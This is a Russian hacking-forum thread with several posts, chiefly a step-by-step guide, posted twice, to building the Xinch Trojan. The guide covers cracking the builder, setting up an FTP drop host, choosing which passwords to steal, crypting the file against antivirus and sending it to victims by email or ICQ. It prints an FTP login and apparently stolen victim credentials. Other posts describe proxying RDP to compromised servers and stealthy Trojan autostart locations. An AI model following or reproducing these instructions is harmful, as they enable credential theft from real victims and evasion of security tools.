              Для работы на дедике через прокси нужна программа SocksCap (Скачать). Она позволяет в любой программе, даже не поддерживающую прокси, работать через последнюю. Требуются рабочие Socks4/Socks5 прокси (имеются на каждом хак. форуме). Итак, сначала настроим программу. Для этого: File-Settings... В поле "Socks Server" пишем адрес прокси, в поле "Port" - порт. Далее в группе "Protocol" выбираем протокол прокси. Для Socks4: Socks User ID - пишем Administrator. Если используется Socks5 и необходима авторизация на прокси, то: ставим галочку на "Username/Password", жмем ОК, потом File-Username/Password... и пишем свой логин и пароль от прокси. Далее, применяем все параметры (если еще не применили), и жмем File-New... В поле "Profile Name" пишем что хотим, так будет называться ярлык для запуска программы через прокси, "Command Line" - (путь к папке windows\system32\, например c:\windows\system32\)mstsc.exe(например, C:\WINDOWS\system32\mstsc.exe), "Working directory" в данном случае можно оставить пустым. Для запуска просто двойной клик на ярлыке программы в SocksCap. Так же можно использовать программу Anonymous Guest (Скачать), которая позволяет менять прокси для SocksCap в пару кликов, но об этом можете прочитать тут - [url=http://www.spszone.com/articles/proxy_faq_ru.htm]

              Комментарий


              • #67
                Небольшое [FAQ] По Троянам. (Новичкам)

                Здравствуйте пользователи Форума k0d.cc, Меня Зовут Николай и В Этом топике я помогу вам освоится в использовании троянов, а именно научу вас взламывать ими.
                В Данном Топике я Указал Всего лишь Один из кучи способов по взлому.



                Для Начала Нам Нужно Будет Зарегистрироваться на Хостинге Файлов* - Куда Нам будет приходить отчет и сами файлы на ФТП. ( Куки, Пароли, Файлы КВМ , ПВМ )
                Самый Подходящий Бесплатный хостинг Это - [url=http://www.wallst.ru]

                Комментарий


                • #68
                  Настройка ксинча и сам он.

                  Добрый день! Сей час я вам покажу как можно с помощью Трояна Xinch 1.5 alpha украсть инфу у Юзера. Приступим…
                  Что нам надо?
                  1.Зарегить Хост для приема отчетов на 1Gb.ru - Дом для вашего сайта; универсальный ASP, .NET и PHP/PERL/SSI хостинг или на каком нибуть другом Хостинге.
                  2.Программа CuteFtp.8.2.0.pro.build Скачать DepositFiles
                  3.Завести левое мыло для получение подтверждения регистрации с нашего Хоста, я буду использовать [email protected], а вы используете своё.
                  4.Сам Троян Xinch 1.5 alpha Скачать DepositFiles (пароль к архиву: 5555)
                  5.Криптор Egy Crypter Modded By Le!Tj0 или любой другой
                  6.Прогу для лечения компа Spyware Doctor 6.0.1.440 (если вы собираетесь на себе испробовать данный Трой) Скачать DepositFiles
                  Первый шаг:
                  Нам надо зарегить хост на 1Gb.ru - Дом для вашего сайта; универсальный ASP, .NET и PHP/PERL/SSI хостинг, там в папку http мы положим скрипт под названием infile2.php но об этом по позже.
                  Регимся… Заходим на сайт http://www.1gb.ruЗдесь нажмите на "Заказать хостинг и регистрацию этого домена"Здесь мы ****аем мыло куда придёт наше подтверждение о регистрации, а в поле оплата заказа ставим тестовый режим и нажимаем ПродолжитьЗдесь нажимаем на Далее вас выкинет где надо вводить дофига всякой инфы но мы на неё забъём проверим нашу почту подтвердим регистрацию т.к там уже лежат письма о подтверждении регистрации также логин и пароль для входа в наш акаунт но можно зайти и по другому в наш акаун нажав на закладку Начало
                  Смотрим скрин:Здесь мы выбираем пункт "Пароли на ресурсы (FTP, почта, mySQL)" и также мы видим дофига всякой инфы но нам нужна вот эта.
                  Смотрим скрин:Из этого мы выбираем вот эти пункты

                  Внутренний/тестовый адрес: http://xinch-ru.1gb.ru
                  FTP сервер: xinch-ru.1gb.ru
                  пользователь: 1gb_xinch-ru
                  FTP пароль: 048de30d

                  где http://xinch-ru.1gb.ru наш сайт

                  Второй шаг:
                  Скачиваем и устанавливаем программу CuteFtp.8.2.0.pro.build. Установили?
                  Открываем прогу и вносим в неё наши данные

                  FTP сервер: xinch-ru.1gb.ru
                  пользователь: 1gb_xinch-ru
                  FTP пароль: 048de30d

                  Смотрим скрин:Нажимаем Connect и что мы видим
                  Смотрим скрин:А видим мы папку http заходим туда и всё от туда удаляемТретий шаг:
                  Скачиваем и распаковываем наш архив с Торяном Xinch 1.5 alpha перед этим выключив свой антивир чтоб он нам не мешал. Запускаем BuilderX он нам даёт серийный номер мы его копируем заходим в папку Xinch 1.5 alpha-keygen запускаем кейген под именем Project1 в поле Сюда ID вставляем наш серийный номер и нажимаем Получить кей из ID. В поле Здесь будет кей должен появится серийный номер мы его копируем и вставляем за место того что был в BuilderX и нажимаем ОК. У нас должна выйти вот такая программа.
                  Смотрим скрин:Теперь перед тем как Скомпилировать нашего Трояна нам надо зайди в наш CuteFtp.8.2.0.pro.build в папку http и залить туда наш скрипт под названием infile2.php который находится в папке Scripts. Заливаем…еперь довайте вспомним нашу регистрацию точнее наше название сайта http://xinch-ru.1gb.ru в нём мы прописываем скрипт infile2.php и что у нас получается, а получается у нас вот это http://xinch-ru.1gb.ru/infile2.php. Теперь мы в нашем BuilderX переходим на закладку HTTP в низу и в верху, видя в поле Адрес нашу ссылку http://xinch-ru.1gb.ru/infile2.php. На закладке Пароли мы отмечаем то что мы хотим украсть.
                  Смотрим скрин:На закладки Функции в разделе Автозагрузка ставим галочку рядом со словом Автозагрузка. У нас появится точка над словом Обычная. Если мы хотим чтоб нашего Трояна из системы Windows было сложно удалить то мы можем поставить точечку над DLL тогда наш Трой в системе пропишется как файл DLL но я этого не буду делать.
                  Смотрим скрин:Дальше вы можете сами пройтись по закладкам и повыбивать что бы вы хотели чтоб этот Трой в системе делал но я остановлюсь на этом и нажму Скомпилировать.Теперь нажимаем ОК. У нас должен появится не известный файл под названием Xinch.
                  Смотрим скрин:Это есть наш скомпилированный Троян. Теперь можно закрыть BuilderX.
                  Четвёртый шаг:
                  Теперь качаем криптор. Я к примеру буду сей час работать с вот этим Egy Crypter Modded By Le!Tj0. Берём наш сконфигурированный Троян и засовываем в паку нашего криптора.
                  Запускаем его.Нажимаем Encrypt и у нас должен получится уже готовый с иконкой криптованый от антивиров Троян которого не будет видеть AVP.
                  Смотрим скрин:Теперь вы его можете камунебуть втюхать или через E-mail, а лучше через левую аську (я так всегда делаю).
                  Если вы его уже камуто втюхали тогда переходим к пятому шагу нашей темы.
                  P.S: К стати вы его можете проверить на себе не чего страшного не произойдёт только патом пройдитесь прогой Spyware Doctor 6.0.1.440
                  Пятый шаг:
                  Если жертва запустила наш Троян то наш отчет должен лежать в нашем CuteFtp.8.2.0.pro.build. Заходим и смортим.Аха мы увидели новый файл это наш отчёт, значит Ура жертва запустила нашего Трояна. Теперь берём файл с расширением eml и копируем его в туже папку где наш Троян хотя там можно создать другую папку и назвать её к примеру Отчёты. Скопировали? Теперь давайте откроим этот файл с помощью Outlook Express. Открываем:В поле Присоединить щёлкаем правой кнопкой мыши и выбираем пункт Сохранить как и сохраняем его как primer.bin
                  Сохранили? Если да то у вас должен появится вот такой файл.
                  Смотрим скрин:Теперь нам надо наш отчёт расшифровать, а для этого служит программа ParserX. Запускаем её...Здесь нажимаем на закладку Parser и выбираем пункт открыть отчёт, и выбираем наш файл под названием primer.bin
                  Смотрим скрин:И что мы видим о БОЖЕ наш отчёт расшифровался и что он нам дал, давайте посмотрим?Ух ты а он нам дал целых три Аси и вместе с пасами. Давайте посмотрим, а что он нам ещё дал?Ух ты, а он нам ещё и все сайты прислал которые наша жертва посещала и вместе с регистрацией к примеру вот на yandex.ru где логин: r0973, а пас: bk7sqw. Посещаемые сайты находятся в разделе Protected Storage.
                  Ну я думаю на этом хватит вы и так поняли что данный Трой очень много что может украсть и мы это не всё ещё посмотрели. В общем учитесь но не забывайте о безопасности.

                  Комментарий


                  • #69
                    Настройка ксинча и сам он.

                    Добрый день! Сей час я вам покажу как можно с помощью Трояна Xinch 1.5 alpha украсть инфу у Юзера. Приступим…
                    Что нам надо?
                    1.Зарегить Хост для приема отчетов на 1Gb.ru - Дом для вашего сайта; универсальный ASP, .NET и PHP/PERL/SSI хостинг или на каком нибуть другом Хостинге.
                    2.Программа CuteFtp.8.2.0.pro.build Скачать DepositFiles
                    3.Завести левое мыло для получение подтверждения регистрации с нашего Хоста, я буду использовать [email protected], а вы используете своё.
                    4.Сам Троян Xinch 1.5 alpha Скачать DepositFiles (пароль к архиву: 5555)
                    5.Криптор Egy Crypter Modded By Le!Tj0 или любой другой
                    6.Прогу для лечения компа Spyware Doctor 6.0.1.440 (если вы собираетесь на себе испробовать данный Трой) Скачать DepositFiles
                    Первый шаг:
                    Нам надо зарегить хост на 1Gb.ru - Дом для вашего сайта; универсальный ASP, .NET и PHP/PERL/SSI хостинг, там в папку http мы положим скрипт под названием infile2.php но об этом по позже.
                    Регимся… Заходим на сайт http://www.1gb.ruЗдесь нажмите на "Заказать хостинг и регистрацию этого домена"Здесь мы ****аем мыло куда придёт наше подтверждение о регистрации, а в поле оплата заказа ставим тестовый режим и нажимаем ПродолжитьЗдесь нажимаем на Далее вас выкинет где надо вводить дофига всякой инфы но мы на неё забъём проверим нашу почту подтвердим регистрацию т.к там уже лежат письма о подтверждении регистрации также логин и пароль для входа в наш акаунт но можно зайти и по другому в наш акаун нажав на закладку Начало
                    Смотрим скрин:Здесь мы выбираем пункт "Пароли на ресурсы (FTP, почта, mySQL)" и также мы видим дофига всякой инфы но нам нужна вот эта.
                    Смотрим скрин:Из этого мы выбираем вот эти пункты

                    Внутренний/тестовый адрес: http://xinch-ru.1gb.ru
                    FTP сервер: xinch-ru.1gb.ru
                    пользователь: 1gb_xinch-ru
                    FTP пароль: 048de30d

                    где http://xinch-ru.1gb.ru наш сайт

                    Второй шаг:
                    Скачиваем и устанавливаем программу CuteFtp.8.2.0.pro.build. Установили?
                    Открываем прогу и вносим в неё наши данные

                    FTP сервер: xinch-ru.1gb.ru
                    пользователь: 1gb_xinch-ru
                    FTP пароль: 048de30d

                    Смотрим скрин:Нажимаем Connect и что мы видим
                    Смотрим скрин:А видим мы папку http заходим туда и всё от туда удаляемТретий шаг:
                    Скачиваем и распаковываем наш архив с Торяном Xinch 1.5 alpha перед этим выключив свой антивир чтоб он нам не мешал. Запускаем BuilderX он нам даёт серийный номер мы его копируем заходим в папку Xinch 1.5 alpha-keygen запускаем кейген под именем Project1 в поле Сюда ID вставляем наш серийный номер и нажимаем Получить кей из ID. В поле Здесь будет кей должен появится серийный номер мы его копируем и вставляем за место того что был в BuilderX и нажимаем ОК. У нас должна выйти вот такая программа.
                    Смотрим скрин:Теперь перед тем как Скомпилировать нашего Трояна нам надо зайди в наш CuteFtp.8.2.0.pro.build в папку http и залить туда наш скрипт под названием infile2.php который находится в папке Scripts. Заливаем…еперь довайте вспомним нашу регистрацию точнее наше название сайта http://xinch-ru.1gb.ru в нём мы прописываем скрипт infile2.php и что у нас получается, а получается у нас вот это http://xinch-ru.1gb.ru/infile2.php. Теперь мы в нашем BuilderX переходим на закладку HTTP в низу и в верху, видя в поле Адрес нашу ссылку http://xinch-ru.1gb.ru/infile2.php. На закладке Пароли мы отмечаем то что мы хотим украсть.
                    Смотрим скрин:На закладки Функции в разделе Автозагрузка ставим галочку рядом со словом Автозагрузка. У нас появится точка над словом Обычная. Если мы хотим чтоб нашего Трояна из системы Windows было сложно удалить то мы можем поставить точечку над DLL тогда наш Трой в системе пропишется как файл DLL но я этого не буду делать.
                    Смотрим скрин:Дальше вы можете сами пройтись по закладкам и повыбивать что бы вы хотели чтоб этот Трой в системе делал но я остановлюсь на этом и нажму Скомпилировать.Теперь нажимаем ОК. У нас должен появится не известный файл под названием Xinch.
                    Смотрим скрин:Это есть наш скомпилированный Троян. Теперь можно закрыть BuilderX.
                    Четвёртый шаг:
                    Теперь качаем криптор. Я к примеру буду сей час работать с вот этим Egy Crypter Modded By Le!Tj0. Берём наш сконфигурированный Троян и засовываем в паку нашего криптора.
                    Запускаем его.Нажимаем Encrypt и у нас должен получится уже готовый с иконкой криптованый от антивиров Троян которого не будет видеть AVP.
                    Смотрим скрин:Теперь вы его можете камунебуть втюхать или через E-mail, а лучше через левую аську (я так всегда делаю).
                    Если вы его уже камуто втюхали тогда переходим к пятому шагу нашей темы.
                    P.S: К стати вы его можете проверить на себе не чего страшного не произойдёт только патом пройдитесь прогой Spyware Doctor 6.0.1.440
                    Пятый шаг:
                    Если жертва запустила наш Троян то наш отчет должен лежать в нашем CuteFtp.8.2.0.pro.build. Заходим и смортим.Аха мы увидели новый файл это наш отчёт, значит Ура жертва запустила нашего Трояна. Теперь берём файл с расширением eml и копируем его в туже папку где наш Троян хотя там можно создать другую папку и назвать её к примеру Отчёты. Скопировали? Теперь давайте откроим этот файл с помощью Outlook Express. Открываем:В поле Присоединить щёлкаем правой кнопкой мыши и выбираем пункт Сохранить как и сохраняем его как primer.bin
                    Сохранили? Если да то у вас должен появится вот такой файл.
                    Смотрим скрин:Теперь нам надо наш отчёт расшифровать, а для этого служит программа ParserX. Запускаем её...Здесь нажимаем на закладку Parser и выбираем пункт открыть отчёт, и выбираем наш файл под названием primer.bin
                    Смотрим скрин:И что мы видим о БОЖЕ наш отчёт расшифровался и что он нам дал, давайте посмотрим?Ух ты а он нам дал целых три Аси и вместе с пасами. Давайте посмотрим, а что он нам ещё дал?Ух ты, а он нам ещё и все сайты прислал которые наша жертва посещала и вместе с регистрацией к примеру вот на yandex.ru где логин: r0973, а пас: bk7sqw. Посещаемые сайты находятся в разделе Protected Storage.
                    Ну я думаю на этом хватит вы и так поняли что данный Трой очень много что может украсть и мы это не всё ещё посмотрели. В общем учитесь но не забывайте о безопасности.

                    Комментарий


                    • #70
                      Бесплатный gold-аккаунт на depositfiles.com

                      ЧИТАЕМ ВНИМАТЕЛЬНО!
                      Берём сервис HideME.ru — Анонимайзер, веб-прокси: работают все сайты, включая ВКонтакте и Одноклассники или любой другой на ваш вкус, вставляете туда ссылку, к примеру эту
                      [url=http://www.crdd.org/noticias/4564-nu...nt-gratis.html]Photo Finish: The Digital Photographer's Guide to Printing, Showing, and Selling Images

                      Комментарий


                      • #71
                        Автозагрузка в Windows XP

                        Автозагрузка в Windows XP

                        Какие способы автозагрузки существуют? Где найти список программ, загружаемых Windows автоматически? Как отключить списки автозагрузки? Этим темам и посвящена данная статья.

                        Существует немало способов автозагрузки программ. Ниже приведены несколько вариантов для ознакомления, возможно это поможет вам, если возникнет необходимость найти и удалить какую-либо программу из автозагрузки.

                        Способы автозагрузки и отключение списков автозагрузки:

                        Реестр - в реестре автозагрузка представлена в нескольких местах:
                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run] - программы, которые запускаются при входе в систему. Данный раздел отвечает за запуск программ для всех пользователей системы.

                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\RunOnce] - программы, которые запускаются только один раз при входе пользователя в систему. После этого ключи программ автоматически удаляются из данного раздела реестра. Данный раздел отвечает за запуск программ для всех пользователей системы.

                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\RunOnceEx] - программы, которые запускаются только один раз, когда загружается система. Этот раздел используется при инсталляции программ, например для запуска настроечных модулей. После этого ключи программ автоматически удаляются из данного раздела реестра. Данный раздел отвечает за запуск программ для всех пользователей системы.

                        [HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Run] - программы, которые запускаются при входе текущего пользователя в систему.

                        [HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\RunOnce] - программы, которые запускаются только один раз при входе текущего пользователя в систему. После этого ключи программ автоматически удаляются из данного раздела реестра.

                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\RunServices] - программы, которые загружаются при старте системы до входа пользователя в Windows.

                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\RunServicesOnce] - программы отсюда загружаются только один раз, когда загружается система.

                        Например, чтобы автоматически запускать Блокнот при входе текущего пользователя, открываем Редактор реестра (regedit.exe), переходим в раздел

                        [HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Run]
                        и добавляем следующий ключ:
                        "NOTEPAD.EXE"="C:\WINDOWS\\System32\notepad.ex e"

                        Использование групповой политики для автозапуска:
                        - Откройте оснастку "Групповая политика" (gpedit.msc), перейдите на вкладку "Конфигурация компьютера - Административные шаблоны - Система". В правой части оснастки перейдите на пункт "Запускать указанные программы при входе в систему". По умолчанию эта политика не задана, но вы можете добавить туда программу: включаем политику, нажимаем кнопку "Показать - Добавить", указываем путь к программе, при этом если запускаемая программа находится в папке ..WINDOWS\System32\ то можно указать только название программы, иначе придется указать полный путь к программе. При этом в системном реестре в разделе [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\policies] создается подраздел \Explorer\Run с ключами добавленных программ. Пример:

                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\policies\Explorer\Run]

                        "1"="notepad.exe"
                        "2"="iexplore.exe"

                        В итоге получаем запуск Блокнота и Internet Explorer для всех пользователей. Аналогично задается автозапуск для текущих пользователей, в оснастке "Групповая политика" это путь "Конфигурация пользователя - Административные шаблоны - Система", а в реестре раздел

                        [HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\Explorer\Run]

                        При этом программы из этого списка не отображаются в списке программ доступных для отключения в msconfig.exe, а также определяются не всеми менеджерами автозагрузки.
                        Автозапуск из особого списка - Программы могут запускаться и из следующего раздела реестра:

                        [HKEY_CURRENT_USER\Software\Microsoft\ Windows NT\CurrentVersion\Windows]

                        Параметры:

                        "load"="programma" - программы запускаемые до входа пользователя в систему:
                        "run"="programma"- программы запускаемые после входа пользователя в систему.
                        Эти параметры - аналог автозагрузки из Win.ini в Windows 9х. Пример: запускаем Internet Explorer до входа пользователя в систему и Блокнот после входа пользователя в систему:

                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\Windows]

                        "load"="iexplore.exe"
                        "run"="notepad.exe"

                        Не обрабатывать список автозапуска для старых версий - Настраивается с помощью групповой политики: "Конфигурация компьютера - Административные шаблоны - Система - Не обрабатывать список автозапуска для старых версий", если эту политику включить, то не будут запускаться программы из следующих разделов реестра:

                        [HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Run]

                        При использовании этой политики в реестре создается следующий ключ:

                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\policies\Explorer]
                        "DisableLocalMachineRun"=dword:00000001 Аналогично устанавливается политика для текущих пользователей: "Конфигурация пользователя - Административные шаблоны - Система - Не обрабатывать список автозапуска для старых версий" с тем отличием что в реестре эта опция включается в ином месте:

                        [HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\Explorer]
                        "DisableLocalUserRun"=dword:00000001

                        Игнорировать списки автозагрузки программ выполняемых однажды - Настраивается с помощью групповой политики: "Конфигурация компьютера - Административные шаблоны - Система - Не обрабатывать список автозапуска программ, выполняемых однажды", если эту политику включить, то не будут запускаться программы запускаемые из списка
                        [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunOnce] Если эта политика включена, в реестре создается следующий ключ:
                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\policies\Explorer]
                        "DisableLocalMachineRunOnce"=dword:00000001 Так же настраивается политика для текущих пользователей: "Конфигурация пользователя - Административные шаблоны - Система - Не обрабатывать список автозапуска программ, выполняемых однажды" Параметры реестра:

                        [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\policies\Explorer]
                        "DisableLocalUserRunOnce"=dword:00000001
                        Назначенные задания - программы могут запускаться с помощью "Мастера планирования заданий". Посмотреть список установленных заданий, а также добавить новое можно так: "Пуск - Все программы - Стандартные - Служебные - Назначенные задания" - при этом откроется папка ..\WINDOWS\Tasks, в которой отображены назначенные задания. Чтобы добавить новое задание, нужно дважды щелкнуть левой кнопкой мыши по значку "Добавить задание". Запуск программ с помощью этого мастера возможен однократно, при входе в Windows, при включении компьютера, а также по расписанию.
                        Папка "Автозагрузка" - это папка, в которой хранятся ярлыки для программ запускаемых после входа пользователя в систему. Ярлыки в эту папку могут добавляться программами при их установке или пользователем самостоятельно. Существует две папки - общая для всех пользователей и индивидуальная для текущего пользователя. По умолчанию эти папки находятся здесь:
                        ..\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка - это папка, программы из которой будут запускаться для всех пользователей компьютера.
                        ..\Documents and Settings\Username\Главное меню\Программы\Автозагрузка - это папка, программы из которой будут запускаться для текущего пользователя (здесь он назван Username).
                        Посмотреть какие программы у вас запускаются таким способом можно открыв меню "Пуск - Все программы - Автозагрузка". Если вы создадите в этой папке ярлык для какой-нибудь программы, она будет запускаться автоматически после входа пользователя в систему. Если при входе пользователя в систему удерживать нажатой клавишу "Shift", то программы из папок "Автозагрузка" запускаться не будут.
                        Смена папки автозагрузки- Windows считывает данные о пути к папке "Автозагрузка" из реестра. Этот путь прописан в следующих разделах:

                        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\User Shell Folders]
                        "Common Startup"="%ALLUSERSPROFILE%\Главное меню\Программы\Автозагрузка" - для всех пользователей системы.

                        [HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Explorer\User Shell Folders]
                        "Startup"="%USERPROFILE%\Главное меню\Программы\Автозагрузка" - для текущего пользователя.

                        Сменив путь к папке мы получим автозагрузку всех программ из указанной папки. Например:

                        [HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\User Shell Folders]
                        "Startup"="c:\mystartup" - система загрузит все программы, ярлыки которых находятся в папке c:\mystartup\, при этом папка "Автозагрузка" все так же будет отображаться в меню "Пуск", а если у пользователя в ней ничего не было, то он и не заметит подмены.
                        Подмена ярлыка для программы из списка автозагрузки - допустим у вас установлен русскоязычный пакет Microsoft Office. Тогда в папке "Автозагрузка" у вас будет находиться ярлык "Быстрый запуск Microsoft Office" - этот ярлык устанавливается туда по умолчанию. Но вовсе необязательно этот ярлык ссылается именно на "Быстрый запуск Microsoft Office" - вместо него может быть запущена любая другая программа, тем более что на функциональности Office это не скажется.
                        Добавление программы к программе запускаемой из списка автозагрузки - модификация предыдущего варианта - одновременно с загрузкой какой-либо программы из списка автозагрузки у вас будет стартовать другая программа - дело в том, что можно "склеить" два исполняемых файла в один и они будут запускаться одновременно. Существуют программы для такой "склейки". Или ярлык может ссылаться на командный файл, из которого и будут запускаться как оригинальная программа из списка, так и добавленные посторонние программы.
                        Посмотреть список автоматически загружаемых программ можно открыв программу "Сведения о системе" (откройте "Пуск - Все программы - Стандартные - Служебные - Сведения о системе" или наберите msinfo32.exe в командной строке) и перейдя в пункт "Программная среда - Автоматически загружаемые программы". Программа "Свойства системы" отображает группы автозагрузки из реестра и папок "Автозагрузка".
                        Другая программа, позволяющая посмотреть список программ автозагрузки - "Настройка системы" (для запуска наберите msconfig.exe из командной строки). Эта программа кроме просмотра списка автозагрузки предоставляет возможность отключения всех пунктов автозагрузки (вкладка "Общие") или выборочных программ (вкладка "Автозагрузка").
                        Существует множество менеджеров автозагрузки от сторонних разработчиков. Один из таких менеджеров - Startup Extractor, вы можете скачать здесь. Он автоматически сканирует папки автозагрузки, системный реестр, и отображает все найденные программы и файлы в виде списка. Если какая-то программа будет добавлена в список автозагрузки, Startup Extractor сообщит вам об этом и предложит либо оставить эту программу в списке либо удалить ее. При удалении программы из списка Starup Extractor может восстановить ее. Также вы сможете добавлять программы, редактировать параметры программ, сохранять список автозагрузки и многое другое. Программа имеет русский интерфейс, бесплатна, не требует установки.
                        Примечание: Приведенная информация приведена в справочных целях. Вся информация, приведенная выше, относится в первую очередь к опытным пользователям, способным восстановить систему после ошибочных изменений в реестре. Если вы не уверены, что в случае ошибочных действий сможете восстановить систему, не используйте приведенную информацию в практических целях, ошибочные действия при внесении изменений в реестр могут серьезно повредить систему и даже привести к переустановке системы. Начинающие пользователи для добавления программ в список автозагрузки должны использовать только папку "Автозагрузка" или "Мастер назначенных заданий"

                        Комментарий


                        • #72
                          Места для автозагрузки трояна

                          В один прекрасный момент ты понял, что в твоей системе завелся троян. И эта мысль мучает тебя днем и ночью. Твой любимый антивирус вместо рьяных поисков гаденыша весело объявляет, что все чисто, деньги уплачены не зря. И начинаешь ты чахнуть от безысходности, появляется депрессия, пропадает потенция, сосед набивает тебе морду, **** становится невкусным, рейтузы не налезают, появляется перхоть, месячные, кариес, целюлит. В конце концов ты решаешь покончить жизнь самоубийством и вешаешься на открытом приводе CD-ROM'а. Печальная картина, согласись. Мне такое развитие событий совсем не нравится, поэтому будем проблему решать и находить, где же поселился твой компьютерный зверек. Начнем с самых простых мест, так сказать, «официальных».

                          Главное меню / Программы / Автозагрузка

                          Место, предназначенное непосредственно для автозагрузки программ. Так как большинство программ в последнее время предпочитает пользоваться реестром, то многие пользователи уже привыкли, что «Автозагрузка» у них девственно чиста, и практически не заглядывают в эту папку. Поэтому шансы остаться незамеченным есть, но все-таки обнаружить постороннего тут слишком легко. Хотя существует и более интересный вариант: если установлен Microsoft Office, то велика вероятность, что в этой папке находится ярлык «Быстрый запуск Microsoft Office» (речь идет о русскоязычной версии), изменив путь этого ярлыка на свою программу, можно значительно увеличить шансы на успех. А вот на функционировании самого Офиса это не скажется. Работает на всех версиях Windows.

                          win.ini

                          В секцию [windows] этого файла можно добавлять строчки вида «run=path». Где path - полный путь и название исполняемого файла (например, «c:\windows\system\spy.exe», только без кавычек), который будет запускаться при загрузке операционной системы. Этот метод тоже не отличается изобретательностью, поэтому легко обнаруживается. Работает только на Windows 95/98.

                          Реестр

                          Раздел реестра «HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run» самый юзаемый различными троянами, а также всякими ICQ-шными, AVP-шными и прочими детекторами, которые так и лезут в автоматическую загрузку, чтобы посильнее загадить тебе систему. Именно из-за этого я крайне не рекомендую пользоваться этим способом. Работает на всех версиях Windows.

                          Все эти способы хорошо известны, и посторонняя программа, использующая их для автозагрузки, быстро обнаруживается. Тем более, что сейчас появилось много утилит, отслеживающих изменения в критических участках системных файлов и реестра.

                          Замена файла

                          Замена другого автозагружаемого файла - еще один часто применяемый метод, являющийся дальнейшим развитием предыдущих трех. Суть его состоит в том, чтобы заменить один из файлов, которые уже автоматически выполняются операционной системой при загрузке. Для сохранения работоспособности системы оригинальный файл переименовывается и запускается из внедренной программы. Описанный выше пример с ярлыком «Быстрый запуск Microsoft Office» является частным вариантом этого способа, т.к. оригинальный файл можно и не запускать.

                          Можно развить эту идею дальше: не заменять другой файл, а склеивать его вместе с трояном во время инсталляции шпиона. Естественно, при запуске такого двойника должны активизироваться обе программы.

                          Но это все - цветочки, так сказать. При разработке первых версий шпиона Donald Dick были найдены более интересные места, куда можно поселить паразитов.

                          VXD

                          А именно для Windows 95/98 было решено грузить шпиона через свой драйвер VXD. Список загружаемых драйверов находится в реестре в разделе «HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ VxD». Кроме загрузки основного модуля серверной части шпиона, этот драйвер предоставлял и некоторые другие функции, которые проще реализовывались в VXD.

                          В Windows NT/2000, как известно, другая система драйверов, и VXD там отсутствуют. Но тот способ загрузки, который удалось найти для этих операционок, превзошел все ожидания. В разделе реестра «HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager» в параметре «BootExecute» можно прописать программу, которая будет запускаться во время инициализации операционной системы (еще до загрузки графической оболочки и сервисов), однако полноценный PE-EXE файл работать тут не будет. Поэтому сюда при инсталляции шпиона прописывается маленький загрузчик. Все что он делает - это добавляет сервис Donald Dick в реестр. А сам сервис после запуска первым делом убирает себя из реестра. И так при каждой перезагрузке. Таким образом, при работе никаких подозрительных сервисов в реестре не обнаруживается. Пользователь, если и замечает посторонний работающий процесс, понять не может, откуда же он берется.

                          Как показал опыт, методы оказались действительно очень эффективными. Особенно для NT/2000.

                          DLL

                          Однако использование VXD для загрузки шпиона в Windows 95/98 нам показалось все-таки не самым лучшим способом. Поэтому при разработке Donald Dick 2 было решено исследовать другие малоизвестные или недокументированные места, куда можно приживить шпиона. Поиск увенчался успехом. В Microsoft Windows 95/98 была найдена скрытая возможность автозагрузки динамических библиотек при старте операционной системы.

                          Но сначала о том, как происходили поиски. Мы просмотрели список всех загруженных модулей и отметили для себя те, которые отсутствовали в стандартных местах автозагрузки. Среди них оказалась программа mprexe.exe. Эта информация конечно мало полезна. Ведь исполняемый модуль может быть запущен другим автозагружаемым модулем или драйвером. Но при изучении самого mprexe.exe мы обнаружили интересную ссылку на несуществующий раздел реестра «HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ MPRServices». А также упоминание весьма интересных параметров: «DLLName», «EntryPoint» и «StackSize». Мы проделали следующий эксперимент. Для начала создали этот раздел в реестре. Затем в нем создали подключ «TestService». Параметрам этого подключа присвоили нужные значения: в строковые «DLLName» и «EntryPoint» поместили название своего DLL файла и название экспортируемой из него процедуры, соответственно, а числовому параметру «StackSize» присвоили ноль.

                          При загрузке операционной системы процесс mprexe.exe создал в своем контексте новый поток для вызова указанной процедуры из нашей DLL, после чего процедура выполнила свои действия. Т.е. если осуществлять запуск шпионской программы через собственную DLL, то проблема незаметной автозагрузки Трояна будет решена. Но я рекомендую сделать несколько иначе. Гораздо лучше реализовать всю работу шпионской программы непосредственно в DLL. Дело в том, что в этом случае автоматически решается еще одна важная задача - обеспечение невидимости. Так как сервер шпиона в этом случае является отдельным потоком процесса mprexe.exe, то никаких посторонних подозрительных процессов в системе просто не появляется. Это уже другая тема, но если тебе будет интересна проблема обеспечения невидимости, я расскажу об этом в ближайших номерах Х.

